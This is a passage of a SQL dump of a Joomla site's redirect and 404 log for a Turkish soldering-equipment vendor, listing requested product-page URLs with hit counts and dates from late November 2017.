00:00:00',301),(14703,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_sku/results,1-40',NULL,'','',2,0,'2017-11-29 13:14:54','0000-00-00 00:00:00',301),(14704,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-11-29 13:15:46','0000-00-00 00:00:00',301),(14705,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc/results,1-100',NULL,'','',2,0,'2017-11-29 13:20:42','0000-00-00 00:00:00',301),(14706,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/am100_250x250.jpg',NULL,'','',1,0,'2017-11-29 13:26:13','0000-00-00 00:00:00',301),(14707,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-29 13:27:12','0000-00-00 00:00:00',301),(14708,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/konveyorler',NULL,'','',43,0,'2017-11-29 13:31:46','0000-00-00 00:00:00',301),(14709,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,mf_name/dirdesc',NULL,'','',4,0,'2017-11-29 13:45:13','0000-00-00 00:00:00',301),(14710,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-29 13:58:35','0000-00-00 00:00:00',301),(14711,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-20',NULL,'','',5,0,'2017-11-29 14:07:09','0000-00-00 00:00:00',301),(14712,'http://www.3s-technologies.com.tr/index.php/en/products/av132-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-11-29 14:12:41','0000-00-00 00:00:00',301),(14713,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-11-29 14:17:33','0000-00-00 00:00:00',301),(14714,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name?language=tr-tr',NULL,'','',2,0,'2017-11-29 14:36:26','0000-00-00 00:00:00',301),(14715,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_sku/results,1-40',NULL,'','',3,0,'2017-11-29 14:41:59','0000-00-00 00:00:00',301),(14716,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,ordering?language=en-gb',NULL,'','',26,0,'2017-11-29 14:48:46','0000-00-00 00:00:00',301),(14717,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-29 14:53:41','0000-00-00 00:00:00',301),(14718,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-29 15:04:37','0000-00-00 00:00:00',301),(14719,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-29 15:18:54','0000-00-00 00:00:00',301),(14720,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',2,0,'2017-11-29 15:28:27','0000-00-00 00:00:00',301),(14721,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_sku/results,1-10',NULL,'','',6,0,'2017-11-29 15:40:03','0000-00-00 00:00:00',301),(14722,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-29 15:46:53','0000-00-00 00:00:00',301),(14723,'http://3s-technologies.com.tr/modules/mod_add/mod_add.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 15:49:29','0000-00-00 00:00:00',301),(14724,'http://3s-technologies.com.tr/en/modules/mod_phocagallery_image/mod_phocagallery_image.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-29 15:58:23','0000-00-00 00:00:00',301),(14725,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',5,0,'2017-11-29 16:55:32','0000-00-00 00:00:00',301),(14726,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail',NULL,'','',63,0,'2017-11-29 17:15:02','0000-00-00 00:00:00',301),(14727,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/results,1-40',NULL,'','',2,0,'2017-11-29 17:18:46','0000-00-00 00:00:00',301),(14728,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_name?language=tr-tr',NULL,'','',30,0,'2017-11-29 17:46:29','0000-00-00 00:00:00',301),(14729,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-29 17:55:53','0000-00-00 00:00:00',301),(14730,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/dirdesc/results,1-40',NULL,'','',5,0,'2017-11-29 17:59:24','0000-00-00 00:00:00',301),(14731,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-29 18:11:21','0000-00-00 00:00:00',301),(14732,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-11-29 18:34:14','0000-00-00 00:00:00',301),(14733,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_sku/results,1-100',NULL,'','',4,0,'2017-11-29 18:40:03','0000-00-00 00:00:00',301),(14734,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,ordering?language=tr-tr',NULL,'','',25,0,'2017-11-29 19:02:18','0000-00-00 00:00:00',301),(14735,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',7,0,'2017-11-29 19:22:01','0000-00-00 00:00:00',301),(14736,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-29 19:38:22','0000-00-00 00:00:00',301),(14737,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/results,1-20',NULL,'','',3,0,'2017-11-29 19:43:55','0000-00-00 00:00:00',301),(14738,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-29 19:49:43','0000-00-00 00:00:00',301),(14739,'http://www.3s-technologies.com.tr/index.php/en/products/jvk-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-29 20:23:27','0000-00-00 00:00:00',301),(14740,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-29 20:28:09','0000-00-00 00:00:00',301),(14741,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-29 20:32:30','0000-00-00 00:00:00',301),(14742,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/aqueous',NULL,'','',27,0,'2017-11-29 20:43:54','0000-00-00 00:00:00',301),(14743,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc/results,1-100',NULL,'','',4,0,'2017-11-29 20:47:48','0000-00-00 00:00:00',301),(14744,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/aqueous',NULL,'','',26,0,'2017-11-29 20:51:57','0000-00-00 00:00:00',301),(14745,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı?language=tr-tr',NULL,'','',1,0,'2017-11-29 21:13:35','0000-00-00 00:00:00',301),(14746,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-29 21:17:40','0000-00-00 00:00:00',301),(14747,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/results,1-10',NULL,'','',3,0,'2017-11-29 21:24:20','0000-00-00 00:00:00',301),(14748,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,pc.ordering,product_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-11-29 21:31:00','0000-00-00 00:00:00',301),(14749,'http://3s-technologies.com.tr/tr/urunler/manufacturer/kester',NULL,'','',22,0,'2017-11-29 21:42:06','0000-00-00 00:00:00',301),(14750,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-29 22:03:41','0000-00-00 00:00:00',301),(14751,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',430,0,'2017-11-29 22:05:06','0000-00-00 00:00:00',301),(14752,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-29 22:14:12','0000-00-00 00:00:00',301),(14753,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/trident-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-29 22:17:55','0000-00-00 00:00:00',301),(14754,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/trident_full_view_250x250.jpg',NULL,'','',1,0,'2017-11-29 22:20:05','0000-00-00 00:00:00',301),(14755,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2017-11-29 22:35:38','0000-00-00 00:00:00',301),(14756,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/panasonic',NULL,'','',42,0,'2017-11-29 22:55:59','0000-00-00 00:00:00',301),(14757,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/results,1-40',NULL,'','',7,0,'2017-11-29 23:04:21','0000-00-00 00:00:00',301),(14758,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/tolo',NULL,'','',41,0,'2017-11-29 23:04:51','0000-00-00 00:00:00',301),(14759,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-29 23:17:40','0000-00-00 00:00:00',301),(14760,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler',NULL,'','',8,0,'2017-11-29 23:44:20','0000-00-00 00:00:00',301),(14761,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name?language=tr-tr',NULL,'','',30,0,'2017-11-29 23:50:01','0000-00-00 00:00:00',301),(14762,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-29 23:55:29','0000-00-00 00:00:00',301),(14763,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-30 00:05:05','0000-00-00 00:00:00',301),(14764,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-30 00:14:03','0000-00-00 00:00:00',301),(14765,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',14,0,'2017-11-30 00:24:59','0000-00-00 00:00:00',301),(14766,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-30 00:36:55','0000-00-00 00:00:00',301),(14767,'http://3s-technologies.com.tr/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-11-30 00:38:13','0000-00-00 00:00:00',301),(14768,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-5',NULL,'','',3,0,'2017-11-30 00:57:40','0000-00-00 00:00:00',301),(14769,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-50',NULL,'','',13,0,'2017-11-30 01:17:40','0000-00-00 00:00:00',301),(14770,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-11-30 01:24:48','0000-00-00 00:00:00',301),(14771,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/results,1-20',NULL,'','',3,0,'2017-11-30 01:31:00','0000-00-00 00:00:00',301),(14772,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_name/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-11-30 01:32:25','0000-00-00 00:00:00',301),(14773,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc/results,1-100',NULL,'','',5,0,'2017-11-30 01:44:20','0000-00-00 00:00:00',301),(14774,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-30 01:50:39','0000-00-00 00:00:00',301),(14775,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/dirdesc?language=en-gb',NULL,'','',27,0,'2017-11-30 02:05:08','0000-00-00 00:00:00',301),(14776,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-50',NULL,'','',3,0,'2017-11-30 02:37:39','0000-00-00 00:00:00',301),(14777,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',16,0,'2017-11-30 02:42:29','0000-00-00 00:00:00',301),(14778,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-40',NULL,'','',5,0,'2017-11-30 02:44:19','0000-00-00 00:00:00',301),(14779,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/results,1-10',NULL,'','',6,0,'2017-11-30 02:57:39','0000-00-00 00:00:00',301),(14780,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/asp-300-detail',NULL,'','',34,0,'2017-11-30 03:01:43','0000-00-00 00:00:00',301),(14781,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-30 03:33:53','0000-00-00 00:00:00',301),(14782,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-20',NULL,'','',4,0,'2017-11-30 03:44:19','0000-00-00 00:00:00',301),(14783,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/955lc-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-30 03:45:00','0000-00-00 00:00:00',301),(14784,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,product_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-30 03:45:59','0000-00-00 00:00:00',301),(14785,'http://3s-technologies.com.tr/index.php/tr/ueruenler/mx200lp-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-30 03:49:52','0000-00-00 00:00:00',301),(14786,'http://3s-technologies.com.tr/tr/joomla/images/pdf/ape_catalog.pdf',NULL,'','',5,0,'2017-11-30 04:33:51','0000-00-00 00:00:00',301),(14787,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-30 04:41:45','0000-00-00 00:00:00',301),(14788,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2017-11-30 04:44:19','0000-00-00 00:00:00',301),(14789,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-30 04:46:27','0000-00-00 00:00:00',301),(14790,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-30 04:48:28','0000-00-00 00:00:00',301),(14791,'http://3s-technologies.com.tr/en/products/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-30 04:55:11','0000-00-00 00:00:00',301),(14792,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-30 04:55:54','0000-00-00 00:00:00',301),(14793,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-10',NULL,'','',3,0,'2017-11-30 05:10:59','0000-00-00 00:00:00',301),(14794,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-20',NULL,'','',3,0,'2017-11-30 05:11:49','0000-00-00 00:00:00',301),(14795,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-30 05:15:01','0000-00-00 00:00:00',301),(14796,'http://3s-technologies.com.tr/index.php/tr/ueruenler/275-k100-1.2mm-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-30 05:15:11','0000-00-00 00:00:00',301),(14797,'http://www.3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content',NULL,'','',37,0,'2017-11-30 05:28:12','0000-00-00 00:00:00',301),(14798,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,product_sku?language=en-gb',NULL,'','',23,0,'2017-11-30 05:40:33','0000-00-00 00:00:00',301),(14799,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-30 06:02:28','0000-00-00 00:00:00',301),(14800,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/le-40v-detail',NULL,'','',53,0,'2017-11-30 06:03:19','0000-00-00 00:00:00',301),(14801,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name',NULL,'','',13,0,'2017-11-30 06:04:43','0000-00-00 00:00:00',301),(14802,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/results,1-100',NULL,'','',1,0,'2017-11-30 06:33:19','0000-00-00 00:00:00',301),(14803,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-30 07:01:54','0000-00-00 00:00:00',301),(14804,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/spartan-8s-8d-44-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-30 07:11:09','0000-00-00 00:00:00',301),(14805,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',1,0,'2017-11-30 07:26:35','0000-00-00 00:00:00',301),(14806,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_sku/results,1-50',NULL,'','',4,0,'2017-11-30 07:29:38','0000-00-00 00:00:00',301),(14807,'http://3s-technologies.com.tr/components/com_hello/hello.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-30 07:35:18','0000-00-00 00:00:00',301),(14808,'http://3s-technologies.com.tr/cache/index.php',NULL,'3s-technologies.com.tr','',1,0,'2017-11-30 07:35:28','0000-00-00 00:00:00',301),(14809,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-30 07:35:53','0000-00-00 00:00:00',301),(14810,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,ordering',NULL,'','',194,0,'2017-11-30 07:41:38','0000-00-00 00:00:00',301),(14811,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-30 07:47:39','0000-00-00 00:00:00',301),(14812,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-30 07:48:27','0000-00-00 00:00:00',301),(14813,'http://3s-technologies.com.tr/en/search.php',NULL,'3s-technologies.com.tr','',12,0,'2017-11-30 07:51:11','0000-00-00 00:00:00',301),(14814,'http://3s-technologies.com.tr/en/cache/search.php',NULL,'3s-technologies.com.tr','',3,0,'2017-11-30 07:51:47','0000-00-00 00:00:00',301),(14815,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2017-11-30 08:10:38','0000-00-00 00:00:00',301),(14816,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/rl132-detail',NULL,'','',9,0,'2017-11-30 08:11:01','0000-00-00 00:00:00',301),(14817,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,category_name',NULL,'','',19,0,'2017-11-30 08:28:26','0000-00-00 00:00:00',301),(14818,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh6-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-30 08:32:42','0000-00-00 00:00:00',301),(14819,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avb-detail',NULL,'','',27,0,'2017-11-30 08:38:22','0000-00-00 00:00:00',301),(14820,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/results,1-50',NULL,'','',16,0,'2017-11-30 08:41:38','0000-00-00 00:00:00',301),(14821,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_name/results,1-5',NULL,'','',9,0,'2017-11-30 08:47:38','0000-00-00 00:00:00',301),(14822,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-30 08:53:40','0000-00-00 00:00:00',301),(14823,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-44-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-30 08:53:55','0000-00-00 00:00:00',301),(14824,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-30 09:05:38','0000-00-00 00:00:00',301),(14825,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-30 09:18:02','0000-00-00 00:00:00',301),(14826,'http://3s-technologies.com.tr/tr/urunler/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',17,0,'2017-11-30 09:27:09','0000-00-00 00:00:00',301),(14827,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name',NULL,'','',31,0,'2017-11-30 09:27:23','0000-00-00 00:00:00',301),(14828,'http://www.3s-technologies.com.tr/index.php/en/products/flux/955lc-detail',NULL,'','',27,0,'2017-11-30 09:50:36','0000-00-00 00:00:00',301),(14829,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim',NULL,'','',17,0,'2017-11-30 10:13:05','0000-00-00 00:00:00',301),(14830,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole',NULL,'','',15,0,'2017-11-30 10:30:31','0000-00-00 00:00:00',301),(14831,'http://www.3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/english-content',NULL,'','',28,0,'2017-11-30 10:34:35','0000-00-00 00:00:00',301),(14832,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-30 10:36:46','0000-00-00 00:00:00',301),(14833,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/avf-detail',NULL,'','',24,0,'2017-11-30 10:45:22','0000-00-00 00:00:00',301),(14834,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/by,product_name',NULL,'','',17,0,'2017-11-30 10:49:58','0000-00-00 00:00:00',301),(14835,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-k100-28-29-detail',NULL,'','',13,0,'2017-11-30 10:51:19','0000-00-00 00:00:00',301),(14836,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-30 10:59:38','0000-00-00 00:00:00',301),(14837,'http://3s-technologies.com.tr/index.php/en/products/jv131-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-30 11:02:18','0000-00-00 00:00:00',301),(14838,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_sku/results,1-10',NULL,'','',1,0,'2017-11-30 11:05:38','0000-00-00 00:00:00',301),(14839,'http://www.3s-technologies.com.tr/tr/urunler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',9,0,'2017-11-30 11:09:47','0000-00-00 00:00:00',301),(14840,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-30 11:21:23','0000-00-00 00:00:00',301),(14841,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-40',NULL,'','',4,0,'2017-11-30 11:35:39','0000-00-00 00:00:00',301),(14842,'http://3s-technologies.com.tr/tr/urunler/screen-printer/sp-18p-l-detail/askquestion?tmpl=component',NULL,'','',8,0,'2017-11-30 12:06:17','0000-00-00 00:00:00',301),(14843,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_name/results,1-10',NULL,'','',4,0,'2017-11-30 12:23:40','0000-00-00 00:00:00',301),(14844,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-30 12:29:39','0000-00-00 00:00:00',301),(14845,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-30 12:35:38','0000-00-00 00:00:00',301),(14846,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name',NULL,'','',32,0,'2017-11-30 12:45:52','0000-00-00 00:00:00',301),(14847,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/welcome.html',NULL,'','',5,0,'2017-11-30 12:48:17','0000-00-00 00:00:00',301),(14848,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name?language=en-gb',NULL,'','',23,0,'2017-11-30 12:49:07','0000-00-00 00:00:00',301),(14849,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,category_name?language=tr-tr',NULL,'','',29,0,'2017-11-30 12:53:44','0000-00-00 00:00:00',301),(14850,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/jvk-detail',NULL,'','',25,0,'2017-11-30 13:10:39','0000-00-00 00:00:00',301),(14851,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',18,0,'2017-11-30 13:17:58','0000-00-00 00:00:00',301),(14852,'http://3s-technologies.com.tr/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',224,0,'2017-11-30 13:41:47','0000-00-00 00:00:00',301),(14853,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/t_mi300_250x250.jpg',NULL,'','',1,0,'2017-11-30 13:56:16','0000-00-00 